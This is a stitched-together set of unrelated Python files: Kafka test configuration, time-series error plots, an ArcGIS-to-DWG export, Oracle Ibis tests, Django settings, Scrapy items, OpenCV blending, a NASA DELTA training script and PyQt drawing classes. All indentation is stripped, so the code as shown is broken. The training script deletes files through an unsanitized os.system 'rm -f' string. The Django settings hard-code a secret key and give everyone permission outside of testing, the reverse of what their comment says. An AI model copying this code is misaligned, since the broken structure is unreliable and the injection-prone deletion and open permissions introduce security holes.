print >> sys.stderr, "'kafaHome' not specified"
else:
kafkaHome = data["kafkaHome"]
if not "secure" in data:
secure = False
else:
secure = True if data['secure'] else False
print "**** SECURE MODE = %s ****" % secure
# Main
def usage():
print "Usage :"
print sys.argv[0] + " cluster.json testsuite_dir/"
if not len(sys.argv) == 3:
usage()
exit(1)
clusterProp = sys.argv[1]
directory = sys.argv[2] # "./system_test/offset_management_testsuite"
loadClusterProperties(clusterProp)
print "-Kafka Home: " + kafkaHome
print "-Java Home: " + javaHome
print "-ZK port : " + zkPort
print "-Consumers : " + ",".join( consumers )
print "-Consumers (Target): " + ",".join( consumers_target )
print "-Producers : " + ",".join( producers )
print "-Brokers : " + ",".join( brokers )
print "-Brokers (Target): " + ",".join( brokers_target )
print "-Mirror Makers : " + ",".join( mirrormakers )
print "-Zookeepers : " + ",".join( zookeepers )
print "-Zookeepers (Target): " + ",".join( zookeepers_target )
print "-Secure : %s " % secure
# 1 Update all cluster_config.json files
fix_cluster_config_files(directory)
# 2 Update testcase_*_properties.json files
fix_json_properties_files(directory)
# 3 fix role specific property files
fix_other_properties_file(directory)
|
import numpy as np
import matplotlib.pylab as plt
def getErrors(fname):
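"""
Load a saved prediction file and compute per-step error statistics.
(Docstring added for clarity; the layout is inferred from the code below:
each row holds the true series followed by the predicted series, so the first
half of the columns is x_real and the second half is x_pred.)
Returns x_pred, x_real, the per-step RMSE, the per-step NMSE, the per-step
standard deviation of the error, and the step index array L.
"""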
errors = np.loadtxt(fname)
test_len = int(errors.shape[1]/2)
ite = errors.shape[0]
L= np.arange(test_len)
x_real = errors[:,:test_len]
x_pred = errors[:,test_len:]
rmse = np.sqrt(np.mean((x_real-x_pred)**2,axis=0))
nmse = np.zeros(test_len)
for i in range(test_len):
part1 = np.sum((x_real[:,i]-x_pred[:,i])**2)
part2 = np.sum((x_real[:,i]-np.mean(x_real[:,i]))**2)
nmse[i] = part1/part2
error = x_real-x_pred
std = np.std(error,axis=0)
return x_pred,x_real,rmse,nmse,std,L
x_pred,x_real,rmse,nmse,std,L = getErrors('./result/mackeyglass/error_x.txt')
print("nmse",nmse[L])
print("rmse",rmse[L])
print("std",std[L])
plt.figure(0)
plt.subplot(2,2,1)
plt.plot(x_real[:,L[0]],label="Actural x")
plt.plot(x_pred[:,L[0]],label="1 step prediction")
plt.xlabel('N',fontsize=12)
plt.legend()
plt.subplot(2,2,2)
plt.plot(x_real[:,L[19]],label="Actural x")
plt.plot(x_pred[:,L[19]],label="20 step prediction")
plt.xlabel('N',fontsize=12)
plt.legend()
plt.subplot(2,2,3)
plt.plot(x_real[:,L[39]],label="Actural x")
plt.plot(x_pred[:,L[39]],label="40 step prediction")
plt.xlabel('N',fontsize=12)
plt.legend()
plt.subplot(2,2,4)
plt.plot(x_real[:,L[79]],label="Actural x")
plt.plot(x_pred[:,L[79]],label="80 step prediction")
plt.xlabel('N',fontsize=12)
plt.legend()
plt.figure(1)
print(L[:])
_,_,rmse_vr0,_,_,_ = getErrors('./result/mackeyglass/error_x_5_5_vr=0.txt')
_,_,rmse_55,_,_,_ = getErrors('./result/mackeyglass/error_x_5_5.txt')
_,_,rmse_75,_,_,_ = getErrors('./result/mackeyglass/error_x_7_5.txt')
#plt.plot(L[:40]+1,rmse[L[:40]],label="rmse lolimot")
plt.plot(L[:40]+1,rmse_vr0[L[:40]],label="rmse r=5 q=5 vr=0")
plt.plot(L[:40]+1,rmse_55[L[:40]],label="rmse r=5 q=5")
plt.plot(L[:40]+1,rmse_75[L[:40]],label="rmse r=7 q=5")
#plt.xticks([0,2,4,6,8,10])
plt.xlabel('N',fontsize=12)
plt.legend()
plt.figure(2)
plt.subplot(2,1,1)
plt.title("MultiStep prediction of Lorenz system")
plt.plot(x_real[500,L],label="real x")
plt.plot(x_pred[500,L],label="prediction x")
plt.legend()
plt.subplot(2,1,2)
plt.title("Error")
plt.plot(x_real[500,L]-x_pred[500,L])
plt.show()
|
# -*- coding: utf-8 -*-
# Name: GdbToDWG.py
# Description: Export to a clean DWG file
# Author: mav
# To do: replace the temporary gdb with in_memory
# Import system modules
import arcpy, os, datetime
# from arcpy import env
# Start timing, excluding the module imports
now = datetime.datetime.now()
# Global variable definitions
# Paths
input_gdb_folder = r"D:\99_Tmp\1_Operations\Laburets"
input_gdb = "Topo_Travail.gdb"
input_gdb_path = os.path.join(input_gdb_folder, input_gdb)
output_gdb_folder = r"D:\99_Tmp"
output_gdb = "TmpToDWG.gdb"
output_gdb_path = os.path.join(output_gdb_folder, output_gdb)
gabarit_dao_path = r"D:\90_Param\ArcGIS\Scripts\Gdb2Cad\Export_200_CC47.dwg"
output_dao = "OperationArcheo.dwg"
output_dao_path = os.path.join(input_gdb_folder, output_dao)
# Feature classes (CE) to export to the DWG
ceAExporter = [u'CFSd_Pgn', u'CFSd_Pln', u'CpRp_Pln', u'Emprise_Pgn', u'FUS_Bord_Pln', u'FUS_Pgn', u'FUS_Pln', u'Topo_Pgn', u'Topo_Pln', u'Topo_Pts', u'Topo_Stations']
# Feature classes with an 'ACTIF' field used for filtering
ceAFiltrer = [u'CFSd_Pgn', u'CFSd_Pln', u'Emprise_Pgn', u'FUS_Pgn', u'FUS_Pln', u'Topo_Pgn', u'Topo_Pln']
# Create the temporary file geodatabase
if arcpy.Exists(output_gdb_path):
print u"Suppression de la précédente géodatabase temporaire..."
arcpy.Delete_management(output_gdb_path)
print u"Géodatabase temporaire précédente supprimée."
print u"Création de la géodatabase temporaire..."
arcpy.CreateFileGDB_management (output_gdb_folder, output_gdb)
print u"Géodatabase temporaire créée !\n"
# Définition de la Gdb du chantier comme espace de travail par défaut
# Cela permet d'énumérer les CE facilement.
arcpy.env.workspace = input_gdb_path
# Build the list of input feature classes
fcList = arcpy.ListFeatureClasses()
# Walk the gdb looking for the conventional feature classes,
# so that a missing one does not cause an error.
for fc in fcList:
if fc in ceAExporter:
output_fc = os.path.join(output_gdb_path, fc)
print u'Copying ' + fc + '...'
arcpy.Copy_management(fc, output_fc)
print fc + u' has been copied.'
print u"Everything has been copied!\n"
del fc, fcList
# Set the temporary gdb as the default workspace
# We could perhaps use ceAExporter here instead...
# -> check whether a missing feature class would raise an error
arcpy.env.workspace = output_gdb_path
fcList = arcpy.ListFeatureClasses()
# Add the CAD (DAO) fields
print u"Adding and computing the CAD fields on the feature classes..."
for fc in fcList:
print u'Processing ' + fc + '...'
arcpy.AddField_management(fc, "Layer", "TEXT")
# Specific handling for the topo points
if fc in ["Topo_Pts","Topo_Stations"]:
arcpy.AddField_management(fc, "CadType", "TEXT")
arcpy.AddField_management(fc, "RefName", "TEXT")
# Allows the points to be inserted as a "topo point" block
arcpy.CalculateField_management(fc, "CadType", "'INSERT'", "PYTHON_9.3")
# On définit l'attribut "ALT" des bloc AutoCAD TopoPoint et TopoStation
arcpy.AlterField_management(fc, "Z", "ALT")
if fc == "Topo_Pts":
# Here we name the "topo point" block inserted in the CAD template
arcpy.CalculateField_management(fc, "RefName", "'TopoPoint'", "PYTHON_9.3")
# Set the attributes of the "topo point" block, here MAT, ALT and COD
arcpy.AlterField_management(fc, "PT_ID", "MAT")
arcpy.AlterField_management(fc, "ATT1", "COD")
arcpy.CalculateField_management(fc, "Layer", "'Point topo - ' + !CODE_DESCR!", "PYTHON_9.3")
else: # fc=="Topo_Stations"
# Here we name the "station" block inserted in the CAD template
arcpy.CalculateField_management(fc, "RefName", "'TopoStation'", "PYTHON_9.3")
# Set the attributes of the "topo station" block, here MAT and COD
arcpy.AlterField_management(fc, "Matricule", "MAT")
arcpy.AlterField_management(fc, "Observation", "COD")
arcpy.CalculateField_management(fc, "Layer", "'Station topo'", "PYTHON_9.3")
elif fc == "FUS_Bord_Pln":
arcpy.CalculateField_management(fc, "Layer", "!LEGENDE!", "PYTHON_9.3")
else:
arcpy.CalculateField_management(fc, "Layer", "!CODE_DESCR!", "PYTHON_9.3")
print u"Attributs DAO pour " + fc + u" ajoutés."
print u"Champs DAO ajoutés aux classes d'entités et calculés.\n"
# Export DXF/DWG
# Note: the template defines the output file format (DWG/DXF, version)
# but does not change the file extension
print u"Generating the CAD file..."
arcpy.ExportCAD_conversion(fcList, "DWG_R2007", output_dao_path,"Ignore_Filenames_in_Tables","Append_To_Existing_Files", gabarit_dao_path)
later = datetime.datetime.now()
elapsed = later - now
print u'The CAD file was generated in {}.'.format(elapsed)
# except Exception as err:
# arcpy.AddError(err)
# print err
|
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 10 13:14:38 2015
@author: djc@thinksysinc.com
A collection of test functions used to check some basic math in the Python
interface
"""
import math
# A square root function
def sqrt(a):
retval = -1.0;
if a >= 0:
retval = math.sqrt(a);
return retval;
# A basic math test function
def add(a,b):
return a + b;
# Test function for multiple real outputs
def addVerbose(a,b):
return a, b, a + b;
# Test function for multiple outputs that does something useful
def cross(a, b, c, x, y, z):
rx = b * z - c * y
ry = c * x - a * z
rz = a * y - b * x
return rx, ry, rz
# Test function for multiple outputs that does something useful
def crossArray(a, b, c, x, y, z):
rx = b * z - c * y
ry = c * x - a * z
rz = a * y - b * x
return [rx, ry, rz]
# Compute the magnitude of a 3-vector
def magnitude(a, b, c):
return sqrt(a**2 + b**2 + c**2)
# Compute the magnitude of a cross product
def crossmag(a, b, c, x, y, z):
data = cross(a, b, c, x, y, z)
return magnitude(data[0], data[1], data[2])
"""
This function takes a 6 element input vector and builds the 3x3 wedge product,
using the first 3 elements if the input as the first vector and the remaining
elements as the second
Test function for the return of a list of lists
"""
def anticross(arr):
am = []
am.append([0,arr[0]*arr[4] - arr[1]*arr[3], arr[0]*arr[5] - arr[2]*arr[3]])
am.append([0,0,arr[1]*arr[5] - arr[2]*arr[4]])
am.append([0,0,0])
am[1][0] = -am[0][1]
am[2][0] = -am[0][2]
am[2][1] = -am[1][2]
return am
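# A minimal usage sketch (illustrative vectors): the wedge-product matrix built by
# anticross() carries the same numbers as cross(); for u=(1,2,3) and v=(4,5,6),
# am[1][2] == rx, -am[0][2] == ry and am[0][1] == rz.
if __name__ == "__main__":
    u_and_v = [1.0, 2.0, 3.0, 4.0, 5.0, 6.0]
    rx, ry, rz = cross(*u_and_v)                       # (-3.0, 6.0, -3.0)
    am = anticross(u_and_v)
    print(rx, ry, rz)
    print(am[1][2], -am[0][2], am[0][1])               # also -3.0, 6.0, -3.0
    print(crossmag(*u_and_v), magnitude(rx, ry, rz))   # both sqrt(54) ~= 7.348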
|
expected_output = {'interfaces': {'Ethernet1/33': {'in_bcast_pkts': 0,
'in_mcast_pkts': 64,
'in_octets': 1162614,
'in_ucast_pkts': 14178,
'out_bcast_pkts': 1,
'out_mcast_pkts': 65,
'out_octets': 12199396,
'out_ucast_pkts': 23366}}}
|
# Copyright 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pandas as pd
import pytest
import ibis
import ibis.expr.types as ir
import third_party.ibis.ibis_oracle.api
from third_party.ibis.ibis_oracle.api import compile
from ibis.tests.util import assert_equal
sa = pytest.importorskip('sqlalchemy')
pytest.importorskip('cx_Oracle')
pytestmark = pytest.mark.oracle
ORACLE_TEST_HOST = os.environ.get('IBIS_TEST_ORACLE_HOST', 'host')
ORACLE_TEST_PORT = os.environ.get('IBIS_TEST_ORACLE_PORT', 'port')
ORACLE_TEST_PROTOCOL = os.environ.get('IBIS_TEST_ORACLE_PROTOCOL', 'PROTOCOL')
ORACLE_TEST_DB = os.environ.get('IBIS_TEST_ORACLE_DATABASE', 'database')
IBIS_ORACLE_USER = os.environ.get('IBIS_TEST_ORACLE_USER', 'username')
IBIS_ORACLE_PASS = os.environ.get('IBIS_TEST_ORACLE_PASSWORD', 'password')
def test_table(alltypes):
assert isinstance(alltypes, ir.TableExpr)
def test_array_execute(alltypes):
d = alltypes.limit(10).double_col
s = d.execute()
assert isinstance(s, pd.Series)
assert len(s) == 5
def test_literal_execute(con):
expr = ibis.literal('1234')
result = con.execute(expr)
assert result == '1234'
def test_simple_aggregate_execute(alltypes):
d = alltypes.double_col.sum()
v = d.execute()
assert isinstance(v, float)
def test_list_tables(con):
assert len(con.list_tables()) > 0
assert len(con.list_tables(like='functional')) == 1
def test_compile_verify(alltypes):
unsupported_expr = alltypes.double_col.approx_median()
assert not unsupported_expr.verify()
supported_expr = alltypes.double_col.sum()
assert supported_expr.verify()
def test_database_layer(con, alltypes):
db = con.database()
t = db.functional_alltypes
assert_equal(t, alltypes)
assert db.list_tables() == con.list_tables()
db_schema = con.schema("admin")
assert db_schema.list_tables() == con.list_tables()
def test_compile_toplevel():
t = ibis.table([('foo', 'double')], name='t0')
expr = t.foo.sum()
result = third_party.ibis.ibis_oracle.api.compile(expr)
expected = "SELECT sum(t0.foo) AS sum \nFROM t0 AS t0" # noqa
assert str(result) == expected
def test_list_databases(con):
assert ORACLE_TEST_DB is not None
assert 'EUK1POD' in con.list_databases()
def test_list_schemas(con):
assert 'admin' in con.list_schemas()
assert 'adbsnmp' in con.list_schemas()
def test_metadata_is_per_table():
con = third_party.ibis.ibis_oracle.api.connect(
host=ORACLE_TEST_HOST,
port=ORACLE_TEST_PORT,
user=IBIS_ORACLE_USER,
password=IBIS_ORACLE_PASS,
database=ORACLE_TEST_DB,
protocol=ORACLE_TEST_PROTOCOL,
)
assert len(con.meta.tables) == 0
# assert that we reflect only when a table is requested
t = con.table('functional_alltypes') # noqa
assert 'functional_alltypes' in con.meta.tables
assert len(con.meta.tables) == 1
def test_schema_table():
con = third_party.ibis.ibis_oracle.api.connect(
host=ORACLE_TEST_HOST,
port=ORACLE_TEST_PORT,
user=IBIS_ORACLE_USER,
password=IBIS_ORACLE_PASS,
database=ORACLE_TEST_DB,
protocol=ORACLE_TEST_PROTOCOL,
)
# ensure that we can reflect the information schema (which is guaranteed
# to exist)
schema = con.schema('admin')
assert isinstance(schema['students'], ir.TableExpr)
|
from django.urls import path
from . import views
# from doobi.users.views import (
# user_detail_view,
# user_redirect_view,
# user_update_view,
# )
app_name = "users"
urlpatterns = [
# path("~redirect/", view=user_redirect_view, name="redirect"),
# path("~update/", view=user_update_view, name="update"),
# path("<str:username>/", view=user_detail_view, name="detail"),
path("", views.loggingin, name='loggingin'),
path("mypage/", views.mypage, name='mypage'),
path("get_recent_weight", views.get_recent_weight, name='get_recent_weight')
]
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
from scrapy.loader.processors import TakeFirst
def remove_star_text(input_string):
"""
Simple preprocess custom method
"""
if "star-rating" in input_string[0]:
return input_string[0].split(" ")[-1]
return input_string
class BookDataItemLoaderItem(scrapy.Item):
"""
When using ItemLoader we can define an output and input process per field.
Since ItemLoader returns lists by default, we can take the first element
of each list -- the data we want -- with the TakeFirst method.
We also did some processing with the remove_star_text method.
"""
item_number = scrapy.Field(
output_processor=TakeFirst())
title = scrapy.Field(
output_processor=TakeFirst())
price = scrapy.Field(
output_processor=TakeFirst())
stars = scrapy.Field(
input_processor=remove_star_text,
output_processor=TakeFirst())
thumbnail_path = scrapy.Field(
output_processor=TakeFirst())
detailed_book_url = scrapy.Field(
output_processor=TakeFirst())
image_url = scrapy.Field(
output_processor=TakeFirst())
product_description = scrapy.Field(
output_processor=TakeFirst())
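# --- A minimal usage sketch (illustrative values, run outside a spider): the
# --- ItemLoader applies remove_star_text as the input processor and TakeFirst as
# --- the output processor, so a raw class string such as "star-rating Three" is
# --- stored simply as "Three".
if __name__ == "__main__":
    from scrapy.loader import ItemLoader

    loader = ItemLoader(item=BookDataItemLoaderItem())
    loader.add_value("title", "A Light in the Attic")   # hypothetical book title
    loader.add_value("stars", "star-rating Three")      # raw CSS class text
    book = loader.load_item()
    print(book["title"], book["stars"])                 # -> A Light in the Attic Three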
|
import cv2
alpha = 0.5
beta = 1 - alpha
src1 = cv2.imread('./Media/sample.jpeg')
src2 = cv2.imread('./Media/sample2.jpeg')
# Check that both images loaded correctly
if src1 is None:
print("Error loading Src1")
exit(-1)
elif src2 is None:
print("Error loading src2")
exit(-1)
# Blend the two images with addWeighted: dst = src1*alpha + src2*beta + gamma
dst = cv2.addWeighted(src1, alpha, src2, beta, 0.0)
cv2.imshow('Mixed Image', dst)
k = cv2.waitKey(0) & 0xFF
if k == 27:
cv2.destroyAllWindows()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import settings
from server.domain.models import *
from core_backend.database import con, connect
from sqlalchemy import create_engine
from core_backend.database.base import DomainBase
if __name__ == "__main__":
print(settings.DB_URL)
engine = create_engine(settings.DB_URL)
DomainBase.metadata.create_all(engine)
|
# Django settings for test_project project.
import os
import sys
DEBUG = True
TESTING = sys.argv[1:2] == ['test']
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(os.path.dirname(__file__), 'test_project.db'),
}
}
USE_I18N = True
USE_L10N = True
SECRET_KEY = 'lol I dont even care'
MIDDLEWARE = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.locale.LocaleMiddleware'
)
TEMPLATES = [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': (os.path.join(os.path.realpath('.'), "templates"), ),
'APP_DIRS': True,
'OPTIONS': {
'context_processors': (
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request'
),
'debug': False
}
}]
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(os.path.join(os.path.realpath('.'), "..", "front", "static")),
]
ROOT_URLCONF = 'test_project.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'test_project.wsgi.application'
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'front',
)
SITE_ID = 1
# For testing purposes we allow everyone to have permission
if not TESTING:
# Don't use this permission in production unless you want everyone,
# even the anonymous user, to have permissions.
# This setting just makes the test_project more straightforward to use.
DJANGO_FRONT_PERMISSION = lambda u: True
|
# Copyright © 2020, United States Government, as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All rights reserved.
#
# The DELTA (Deep Earth Learning, Tools, and Analysis) platform is
# licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Train a neural network.
"""
import sys
import time
import os
#import logging
#logging.getLogger("tensorflow").setLevel(logging.DEBUG)
import tensorflow as tf
from delta.config import config
from delta.config.extensions import custom_objects
from delta.imagery import imagery_dataset
from delta.ml.train import train
from delta.ml.config_parser import config_model
from delta.ml.io import save_model
#tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.DEBUG)
def main(options):
log_folder = config.train.log_folder()
if log_folder:
if not options.resume: # Start fresh and clear the read logs
os.system('rm -f ' + log_folder + '/*')
print('Dataset progress recording in: ' + log_folder)
else:
print('Resuming dataset progress recorded in: ' + log_folder)
images = config.dataset.images()
if not images:
print('No images specified.', file=sys.stderr)
return 1
img = images.load(0)
model = config_model(img.num_bands())
if options.resume is not None:
temp_model = tf.keras.models.load_model(options.resume, custom_objects=custom_objects())
else:
# this one is not built with proper scope, just used to get input and output shapes
temp_model = model()
start_time = time.time()
tile_size = config.io.tile_size()
tile_overlap = None
stride = config.train.spec().stride
# compute input and output sizes
if temp_model.input_shape[1] is None:
in_shape = None
out_shape = temp_model.compute_output_shape((0, tile_size[0], tile_size[1], temp_model.input_shape[3]))
out_shape = out_shape[1:3]
tile_overlap = (tile_size[0] - out_shape[0], tile_size[1] - out_shape[1])
else:
in_shape = temp_model.input_shape[1:3]
out_shape = temp_model.output_shape[1:3]
if options.autoencoder:
ids = imagery_dataset.AutoencoderDataset(images, in_shape, tile_shape=tile_size,
tile_overlap=tile_overlap, stride=stride)
else:
labels = config.dataset.labels()
if not labels:
print('No labels specified.', file=sys.stderr)
return 1
ids = imagery_dataset.ImageryDataset(images, labels, out_shape, in_shape,
tile_shape=tile_size, tile_overlap=tile_overlap,
stride=stride)
if log_folder is not None:
ids.set_resume_mode(options.resume, log_folder)
assert temp_model.input_shape[1] == temp_model.input_shape[2], 'Must have square chunks in model.'
assert temp_model.input_shape[3] == ids.num_bands(), 'Model takes wrong number of bands.'
tf.keras.backend.clear_session()
try:
model, _ = train(model, ids, config.train.spec(), options.resume)
if options.model is not None:
save_model(model, options.model)
except KeyboardInterrupt:
print('Training cancelled.')
stop_time = time.time()
print('Elapsed time = ', stop_time-start_time)
return 0
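# --- A minimal sketch (illustrative numbers, not tied to the real model or config) of
# --- the tile_overlap computed in main() above: when a fully-convolutional model trims
# --- its input, consecutive tiles must overlap by exactly the trimmed amount so that
# --- the predictions still cover the image without gaps.
def _tile_overlap_example(tile_size, out_shape):
    """Overlap needed between tiles of shape tile_size whose predictions have shape out_shape."""
    return (tile_size[0] - out_shape[0], tile_size[1] - out_shape[1])

# e.g. 256x256 tiles producing 196x196 predictions need an overlap of (60, 60):
# _tile_overlap_example((256, 256), (196, 196)) == (60, 60)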
|
from qt import *
from qtcanvas import *
import math
def dxdy(w, x1, y1, x2, y2):
if x1 > x2:
x1, x2 = x2, x1
y1, y2 = y2, y1
a = x2-x1
b = y2-y1
c = math.sqrt(a*a + b*b)
if c == 0:
dx = dy = 0
else:
dx = b * w / c / 2.0
dy = a * w / c / 2.0
return dx,dy, x1,y1, x2,y2
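# dxdy() returns the half-offsets (dx, dy) perpendicular to the segment (x1,y1)-(x2,y2)
# for a stroke of width w, together with the endpoints reordered so that x1 <= x2.
# For example, dxdy(2, 0, 0, 10, 0) gives dx = 0.0, dy = 1.0: a horizontal segment is
# widened purely vertically by half the width on each side.
# (Explanatory comment added; the numbers follow directly from the formula above.)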
class Axis(QCanvasPolygonalItem):
# there should be no gap between two consecutive types
HeadContinue = 0
HeadBranch = 1
HeadNegation = 2
def __init__(self, canvas):
QCanvasPolygonalItem.__init__(self, canvas)
self.pen = QPen(Qt.red)
self.setPen(self.pen)
self.points = (0,0,0,0)
self.area = QPointArray(4)
self.area.setPoint(0,0,0)
self.area.setPoint(1,1,0)
self.area.setPoint(2,1,1)
self.area.setPoint(3,0,1)
self.headType = self.HeadContinue
self.root = None
self.target = None
def areaPoints(self):
return self.area
def setPoints(self, x1,y1,x2,y2):
"""
The line has an orientation; (x1,y1) is the start point and
(x2,y2) is the end point.
"""
self.points = (x1,y1,x2,y2)
dx,dy, x1,y1, x2,y2 = dxdy(self.pen.width()+5.0, x1,y1,x2,y2)
self.area.setPoint(0, x1 + dx, y1 - dy)
self.area.setPoint(1, x1 - dx, y1 + dy)
self.area.setPoint(2, x2 - dx, y2 + dy)
self.area.setPoint(3, x2 + dx, y2 - dy)
def lineWidth(self):
return self.pen.width()
def _drawBranchHead(self, painter):
h = 5.0
x1, y1, x2, y2 = self.points
if x1 == x2:
x = x1 - h
if y2 > y1:
y = y1
else:
y = y1 - 2.0 * h
elif y1 == y2:
if x2 > x1:
x = x1
else:
x = x1 - 2.0 * h
y = y1 - h
else:
xx = float(x2 - x1)
yy = float(y2 - y1)
r = abs(yy / xx)
h1 = h / math.sqrt(2.0)
x = x1 + h * xx / abs(xx) / math.sqrt(1 + r*r) - h1
y = y1 + h * yy / abs(yy) / math.sqrt(1 + r*r) * r - h1
p = QPen(self.pen)
p.setWidth(1)
p.setStyle(Qt.SolidLine)
painter.setPen(p)
painter.setBrush(QBrush(p.color()))
painter.drawEllipse(x,y, 2*h, 2*h)
def _drawNegationHead(self, painter):
h = 5.0
x1, y1, x2, y2 = self.points
if x1 == x2:
new_x1 = x1 - h
new_x2 = x1 + h
if y1 > y2:
new_y1 = new_y2 = y1 - h
else:
new_y1 = new_y2 = y1 + h
elif y1 == y2:
if x1 > x2:
new_x1 = new_x2 = x1 - h
else:
new_x1 = new_x2 = x1 + h
new_y1 = y1 - h
new_y2 = y1 + h
else:
xx = x2 - x1
yy = y2 - y1
sigx = xx / abs(xx)
sigy = yy / abs(yy)
r = abs(yy / xx)
c = h / r
a = math.sqrt(c*c + h*h) / (1+r*r)
dx = sigx * a * r * r
dy = sigy * a * r
x11 = x1 + sigx * abs(dy)
y11 = y1 + sigy * abs(dx)
new_x1 = x11 + dx
new_y1 = y11 - dy
new_x2 = x11 - dx
new_y2 = y11 + dy
pen = QPen(self.pen)
pen.setWidth(2)
pen.setStyle(Qt.SolidLine)
painter.setPen(pen)
painter.drawLine(new_x1,new_y1,new_x2,new_y2)
def drawLineHead(self, painter):
if self.headType == self.HeadBranch:
self._drawBranchHead(painter)
elif self.headType == self.HeadNegation:
self._drawNegationHead(painter)
def drawShape(self, painter):
painter.drawLine(*self.points)
self.drawLineHead(painter)
def toggleHeadType(self):
self.headType = (self.headType + 1) % 3
self.update()
self.canvas().update()
def setHeadType(self, typ):
if typ not in (self.HeadContinue,
self.HeadBranch,
self.HeadNegation):
return
self.headType = typ
self.update()
self.canvas().update()
class AxisFollowing(Axis):
def __init__(self, canvas):
Axis.__init__(self, canvas)
self.pen.setWidth(3)
self.pen.setStyle(Qt.DashLine)
self.setPen(self.pen)
class AxisImmediateFollowing(Axis):
def __init__(self, canvas):
Axis.__init__(self, canvas)
self.pen.setWidth(3)
self.setPen(self.pen)
class AxisSibling(Axis):
def __init__(self, canvas):
Axis.__init__(self, canvas)
self.pen.setWidth(2)
self.pen.setStyle(Qt.DashLine)
self.setPen(self.pen)
self.distance = 2.0
def drawShape(self, painter):
x1,y1,x2,y2 = self.points
dx, dy, x1,y1, x2,y2 = dxdy(self.distance+self.pen.width(), x1,y1, x2,y2)
painter.drawLine(x1+dx,y1-dy,x2+dx,y2-dy)
painter.drawLine(x1-dx,y1+dy,x2-dx,y2+dy)
self.drawLineHead(painter)
def lineWidth(self):
return self.pen.width() * 2.0 + self.distance
class AxisImmediateSibling(Axis):
def __init__(self, canvas):
Axis.__init__(self, canvas)
self.pen.setWidth(2)
self.setPen(self.pen)
self.distance = 2.0
def drawShape(self, painter):
x1,y1,x2,y2 = self.points
dx, dy, x1,y1, x2,y2 = dxdy(self.distance+self.pen.width(), x1,y1, x2,y2)
painter.drawLine(x1+dx,y1-dy,x2+dx,y2-dy)
painter.drawLine(x1-dx,y1+dy,x2-dx,y2+dy)
self.drawLineHead(painter)
def lineWidth(self):
return self.pen.width() * 2.0 + self.distance
class AxisAncestor(Axis):
def __init__(self, canvas):
Axis.__init__(self, canvas)
self.pen.setWidth(3)
self.pen.setStyle(Qt.DashLine)
self.pen.setColor(Qt.blue)
self.setPen(self.pen)
class AxisParent(Axis):
def __init__(self, canvas):
Axis.__init__(self, canvas)
self.pen.setWidth(3)
self.pen.setColor(Qt.blue)
self.setPen(self.pen)
pen = QPen(Qt.red)
pen.setWidth(3)
pen.setStyle(Qt.DashLine)
penFollowing = pen
pen = QPen(Qt.red)
pen.setWidth(3)
penImmFollowing = pen
class AxisButton(QPushButton):
def __init__(self, pen, parent):
QPushButton.__init__(self, parent)
self.pen = pen
def drawLine(self, y):
p = QPainter(self)
p.setPen(self.pen)
x1 = 10
x2 = self.width() - 10
p.drawLine(x1, y, x2, y)
def paintEvent(self, e):
QPushButton.paintEvent(self, e)
self.drawLine(self.height() / 2.0)
class AxisButtonFollowing(AxisButton):
def __init__(self, parent, pen=penFollowing):
AxisButton.__init__(self, pen, parent)
class AxisButtonImmFollowing(AxisButtonFollowing):
def __init__(self, parent, pen=penImmFollowing):
AxisButtonFollowing.__init__(self, parent, pen)
class AxisButtonSibling(AxisButton):
def __init__(self, parent, pen=penFollowing):
AxisButton.__init__(self, pen, parent)
def paintEvent(self, e):
QPushButton.paintEvent(self, e)
y = self.height() / 2.0
dy = 1 + self.pen.width() / 2.0
y1 = y - dy
y2 = y + dy
self.drawLine(y1)
self.drawLine(y2)
class AxisButtonImmSibling(AxisButtonSibling):
def __init__(self, parent):
AxisButtonSibling.__init__(self, parent, penImmFollowing)
class AxisButtonParent(AxisButtonImmFollowing):
def __init__(self, parent):
AxisButtonImmFollowing.__init__(self, parent)
self.pen = QPen(self.pen)
self.pen.setColor(Qt.blue)
class AxisButtonAncestor(AxisButtonFollowing):
def __init__(self, parent):
AxisButtonFollowing.__init__(self, parent)
self.pen = QPen(self.pen)
self.pen.setColor(Qt.blue)
iconAxisFollowing = [
'22 1 1 1',
'r c #FF0000',
'rrrrrrrrrrrrrrrrrrrrrr',
]
textfileopen = [
'16 13 5 1',
'. c #040404',
'# c #333333',
'a c None',
'b c #ffffff',
'c c #ffffff',
'aaaaaaaaa...aaaa',
'aaaaaaaa.aaa.a.a',
'aaaaaaaaaaaaa..a',
'a...aaaaaaaa...a',
'.bcb.......aaaaa',
'.cbcbcbcbc.aaaaa',
'.bcbcbcbcb.aaaaa',
'.cbcb...........',
'.bcb.#########.a',
'.cb.#########.aa',
'.b.#########.aaa',
'..#########.aaaa',
'...........aaaaa'
]
|
import torch
import torch.nn as nn
